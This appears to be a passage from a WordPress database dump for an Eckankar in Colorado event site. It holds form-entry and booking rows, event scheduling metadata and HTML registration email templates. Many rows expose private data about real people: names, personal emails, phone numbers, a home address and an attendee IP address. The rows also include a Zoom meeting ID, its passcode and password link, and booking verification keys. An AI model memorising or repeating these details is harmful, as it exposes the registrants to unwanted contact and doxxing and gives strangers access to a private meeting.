Way - STARTS IN NOVEMBER -- 2nd Tuesday at 700-830 pm - Zoom'),(193560,269186,'_field_649',''),(193561,269186,'_form_id','61'),(193562,269186,'_seq_num','48'),(193563,269187,'_field_654','Gardiner'),(193564,269187,'_field_652','Tucker'),(193565,269187,'_field_653','tuck436@gmail.com'),(193566,269187,'_field_651','(303) 709-5004'),(193567,269187,'_field_656','The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 700-830 pm - Zoom'),(193568,269187,'_field_649',''),(193569,269187,'_form_id','61'),(193570,269187,'_seq_num','49'),(193571,269188,'_field_30','Thomas'),(193572,269188,'_field_31','Engel'),(193573,269188,'_field_32','(435) 632-7454'),(193574,269188,'_field_33','engel.thomasj@gmail.com'),(193575,269188,'_field_34','5801 S Garnet Dr'),(193576,269188,'_field_35','St. George'),(193577,269188,'_field_36','UT'),(193578,269188,'_field_37','US'),(193579,269188,'_field_39',''),(193580,269188,'_form_id','4'),(193581,269188,'_seq_num','37'),(193582,269189,'_field_179','Thomas'),(193583,269189,'_field_180','Engel'),(193584,269189,'_field_181','engel.thomasj@gmail.com'),(193585,269189,'_field_182','UT'),(193586,269189,'_field_183','US'),(193587,269189,'_field_184','a:2:{i:0;s:16:\"Colorado Springs\";i:1;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(193588,269189,'_form_id','17'),(193589,269189,'_seq_num','24'),(193590,269190,'_field_654','Lura'),(193591,269190,'_field_652','Fischer'),(193592,269190,'_field_653','lurafischer@me.com'),(193593,269190,'_field_651','(720) 933-8433'),(193594,269190,'_field_656','The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 700-830 pm - Zoom'),(193595,269190,'_field_649',''),(193596,269190,'_form_id','61'),(193597,269190,'_seq_num','50'),(193598,269191,'_field_654','James'),(193599,269191,'_field_652','Fischer'),(193600,269191,'_field_653','jfischer1@me.com'),(193601,269191,'_field_651','(720) 839-9691'),(193602,269191,'_field_656','The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 700-830 pm - Zoom'),(193603,269191,'_field_649',''),(193604,269191,'_form_id','61'),(193605,269191,'_seq_num','51'),(193606,269193,'_field_654','Becky'),(193607,269193,'_field_652','Crandell'),(193608,269193,'_field_653','beckamingo@gmail.com'),(193609,269193,'_field_651','(802) 272-2485'),(193610,269193,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(193611,269193,'_field_649',''),(193612,269193,'_form_id','61'),(193613,269193,'_seq_num','52'),(193614,269194,'_field_654','Elizabeth '),(193615,269194,'_field_652','Albright '),(193616,269194,'_field_653','betsyttouch@yahoo.com'),(193617,269194,'_field_651','(706) 248-0612'),(193618,269194,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(193619,269194,'_field_649','Please let me know if this class follows what I’ve already finished\nThanks Elizabeth Albright'),(193620,269194,'_form_id','61'),(193621,269194,'_seq_num','53'),(193622,269195,'_field_654','Rosanne'),(193623,269195,'_field_652','Parimuha'),(193624,269195,'_field_653','huumom@gmail.com'),(193625,269195,'_field_651','(720) 234-7489'),(193626,269195,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(193627,269195,'_field_649',''),(193628,269195,'_form_id','61'),(193406,269177,'mec_cancellation_key','79cac091935d208c088907ab1c6d385a'),(193405,269177,'mec_verification_key','3f1c2b366f3188324d0cc9f277f8c8fe'),(193404,269177,'mec_verified','1'),(193403,269177,'mec_user_id','1000093'),(193402,269177,'mec_gateway_label','Free'),(193401,269177,'mec_gateway','MEC_gateway_free'),(193400,269177,'mec_transaction_id','YDN56976'),(193399,269176,'mec_local_timezone','America/Denver'),(193398,269176,'mec_payable','0'),(193397,269176,'mec_price','0'),(193396,269176,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:17:\"Chukwuebuka Okwor\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"138.67.174.38\";}}'),(193395,269176,'mec_ticket_price_1','0'),(193394,269176,'mec_booking_location','129'),(193393,269176,'mec_book_date_submit','20231008094727'),(193392,269176,'mec_attention_time_end','1696764600'),(188756,267620,'passster_area_shortcode',''),(188757,267620,'mec_cost_auto_calculate','0'),(188758,267620,'mec_style_per_event','global'),(188759,267620,'mec_trailer_url',''),(188760,267620,'mec_trailer_title',''),(188761,267620,'mec_start_datetime','2023-01-29 10:30 AM'),(188762,267620,'mec_end_datetime','2023-01-29 12:00 PM'),(188763,267620,'mec_sequence','2'),(188764,267620,'mec_event_gallery','a:0:{}'),(188765,267620,'mec_related_events','a:0:{}'),(188766,267620,'mec_banner','a:0:{}'),(188767,268848,'protect_children',''),(188768,268848,'mec_color',''),(188769,268848,'mec_location_id','118'),(188770,268848,'mec_dont_show_map','0'),(188771,268848,'mec_organizer_id','1'),(188772,268848,'mec_read_more',''),(188773,268848,'mec_more_info',''),(188774,268848,'mec_more_info_title',''),(188775,268848,'mec_more_info_target','_self'),(188776,268848,'mec_cost',''),(188777,268848,'mec_currency','a:0:{}'),(188778,268848,'mec_additional_organizer_ids','a:0:{}'),(188779,268848,'mec_additional_location_ids','a:0:{}'),(188780,268848,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-31\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-31\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(188781,268848,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(188782,268848,'mec_certain_weekdays','a:0:{}'),(188783,268848,'mec_allday','0'),(188784,268848,'one_occurrence','0'),(188785,268848,'mec_hide_time','0'),(188786,268848,'mec_hide_end_time','0'),(188787,268848,'mec_comment',''),(188788,268848,'mec_timezone','global'),(188789,268848,'mec_countdown_method','global'),(188790,268848,'mec_public','1'),(188791,268848,'mec_start_date','2023-08-31'),(188792,268848,'mec_start_time_hour','6'),(188793,268848,'mec_start_time_minutes','30'),(188794,268848,'mec_start_time_ampm','PM'),(188795,268848,'mec_start_day_seconds','66600'),(188796,268848,'mec_end_date','2023-08-31'),(188797,268848,'mec_end_time_hour','8'),(188798,268848,'mec_end_time_minutes','15'),(188799,268848,'mec_end_time_ampm','PM'),(188800,268848,'mec_end_day_seconds','72900'),(188801,268848,'mec_repeat_status','0'),(188802,268848,'mec_repeat_type',''),(188803,268848,'mec_repeat_interval','1'),(188804,268848,'mec_repeat_end',''),(188805,268848,'mec_repeat_end_at_occurrences',''),(188806,268848,'mec_repeat_end_at_date',''),(188807,268848,'mec_advanced_days','a:0:{}'),(188808,268848,'mec_in_days',''),(188809,268848,'mec_not_in_days',''),(188810,268848,'mec_hourly_schedules','a:0:{}'),(188811,268848,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188812,268848,'mec_tickets','a:0:{}'),(188813,268848,'mec_fees_global_inheritance','1'),(188814,268848,'mec_fees','a:0:{}'),(188815,268848,'mec_ticket_variations_global_inheritance','1'),(188816,268848,'mec_ticket_variations','a:0:{}'),(188817,268848,'mec_reg_fields_global_inheritance','1'),(188818,268848,'mec_reg_fields','a:0:{}'),(188819,268848,'mec_bfixed_fields','a:0:{}'),(188820,268848,'mec_op','a:0:{}'),(188821,268848,'mec_fields','a:0:{}'),(188822,268848,'mec_event_status','EventScheduled'),(188823,268848,'mec_moved_online_link',''),(188824,268848,'mec_cancelled_reason',''),(188825,268848,'mec_display_cancellation_reason_in_single_page',''),(188826,268848,'boldgrid_hide_page_title','0'),(188827,268848,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(188828,268848,'passster_activate_global_protection',NULL),(188829,268848,'passster_activate_protection',NULL),(188830,268848,'passster_protection_type','password'),(188831,268848,'boldgrid_in_page_containers','1'),(188845,268848,'_dp_original','267620'),(188834,268848,'passster_area_shortcode',''),(188835,268848,'mec_cost_auto_calculate','0'),(188836,268848,'mec_style_per_event','global'),(188837,268848,'mec_trailer_url',''),(188838,268848,'mec_trailer_title',''),(188839,268848,'mec_start_datetime','2023-08-31 06:30 PM'),(188840,268848,'mec_end_datetime','2023-08-31 08:15 PM'),(188841,268848,'mec_sequence','12'),(188842,268848,'mec_event_gallery','a:0:{}'),(188843,268848,'mec_related_events','a:0:{}'),(188844,268848,'mec_banner','a:0:{}'),(188846,268848,'_edit_lock','1690654958:2'),(188847,268848,'_edit_last','2'),(188848,266318,'passster_area_shortcode',''),(188849,266318,'mec_cost_auto_calculate','0'),(188850,266318,'mec_style_per_event','global'),(188851,266318,'mec_trailer_url',''),(188852,266318,'mec_trailer_title',''),(188853,266318,'mec_start_datetime','2023-02-18 10:30 AM'),(188854,266318,'mec_end_datetime','2023-02-18 12:00 PM'),(188855,266318,'mec_sequence','1'),(188856,266318,'mec_event_gallery','a:0:{}'),(188857,266318,'mec_related_events','a:0:{}'),(188858,266318,'mec_banner','a:0:{}'),(188859,268850,'protect_children',''),(188860,268850,'mec_color',''),(188861,268850,'mec_location_id','118'),(188862,268850,'mec_dont_show_map','0'),(188863,268850,'mec_organizer_id','1'),(188864,268850,'mec_read_more',''),(188865,268850,'mec_more_info',''),(188866,268850,'mec_more_info_title',''),(188867,268850,'mec_more_info_target','_self'),(188868,268850,'mec_cost',''),(188869,268850,'mec_currency','a:0:{}'),(188870,268850,'mec_additional_organizer_ids','a:0:{}'),(188871,268850,'mec_additional_location_ids','a:0:{}'),(188872,268850,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-04-22\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-04-22\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(188873,268850,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(188874,268850,'mec_certain_weekdays','a:0:{}'),(188875,268850,'mec_allday','0'),(188876,268850,'one_occurrence','0'),(188877,268850,'mec_hide_time','0'),(188878,268850,'mec_hide_end_time','0'),(188879,268850,'mec_comment',''),(188880,268850,'mec_timezone','global'),(188881,268850,'mec_countdown_method','global'),(188882,268850,'mec_public','1'),(188883,268850,'mec_start_date','2021-04-22'),(188884,268850,'mec_start_time_hour','8'),(188885,268850,'mec_start_time_minutes','0'),(188886,268850,'mec_start_time_ampm','AM'),(188887,268850,'mec_start_day_seconds','28800'),(188888,268850,'mec_end_date','2021-04-22'),(188889,268850,'mec_end_time_hour','6'),(188890,268850,'mec_end_time_minutes','0'),(188891,268850,'mec_end_time_ampm','PM'),(188892,268850,'mec_end_day_seconds','64800'),(188893,268850,'mec_repeat_status','0'),(188894,268850,'mec_repeat_type',''),(188895,268850,'mec_repeat_interval','1'),(188896,268850,'mec_repeat_end',''),(188897,268850,'mec_repeat_end_at_occurrences',''),(188898,268850,'mec_repeat_end_at_date',''),(188899,268850,'mec_advanced_days','a:0:{}'),(188900,268850,'mec_in_days',''),(188901,268850,'mec_not_in_days',''),(188902,268850,'mec_hourly_schedules','a:0:{}'),(188903,268850,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188904,268850,'mec_tickets','a:0:{}'),(188905,268850,'mec_fees_global_inheritance','1'),(188906,268850,'mec_fees','a:0:{}'),(188907,268850,'mec_ticket_variations_global_inheritance','1'),(188908,268850,'mec_ticket_variations','a:0:{}'),(188909,268850,'mec_reg_fields_global_inheritance','1'),(188910,268850,'mec_reg_fields','a:0:{}'),(188911,268850,'mec_bfixed_fields','a:0:{}'),(188912,268850,'mec_op','a:0:{}'),(188913,268850,'mec_fields','a:0:{}'),(188914,268850,'mec_event_status','EventScheduled'),(188915,268850,'mec_moved_online_link',''),(188916,268850,'mec_cancelled_reason',''),(188917,268850,'mec_display_cancellation_reason_in_single_page',''),(188918,268850,'boldgrid_hide_page_title','0'),(188919,268850,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(188920,268850,'passster_activate_global_protection',NULL),(188921,268850,'passster_activate_protection',NULL),(188922,268850,'passster_protection_type','password'),(188923,268850,'boldgrid_in_page_containers','1'),(188937,268850,'_dp_original','267696'),(188925,268850,'passster_area_shortcode',''),(188926,268850,'_wp_old_date','2023-01-14'),(188927,268850,'mec_cost_auto_calculate','0'),(188928,268850,'mec_style_per_event','global'),(188929,268850,'mec_trailer_url',''),(188930,268850,'mec_trailer_title',''),(188931,268850,'mec_start_datetime','2021-04-22 08:00 AM'),(188932,268850,'mec_end_datetime','2021-04-22 06:00 PM'),(188933,268850,'mec_sequence','5'),(188934,268850,'mec_event_gallery','a:0:{}'),(188935,268850,'mec_related_events','a:0:{}'),(188936,268850,'mec_banner','a:0:{}'),(188938,268850,'_edit_lock','1690653636:2'),(188939,268850,'_edit_last','2'),(188964,268848,'_thumbnail_id','268855'),(190643,268947,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 